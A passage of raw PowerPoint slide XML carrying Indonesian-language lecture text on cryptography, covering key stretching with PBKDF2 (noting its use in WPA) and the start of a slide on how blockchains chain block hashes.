              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ribuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>putaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hashing. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditiru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperlambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekstra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peregangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> meng-hash dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Derivasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Kata Sandi 2 (PBKDF2) sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi Protected Access (WPA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5977980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Blockchain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Blockchain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash. Nilai hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhitungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berurutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sampai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>historis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stempel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transaksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
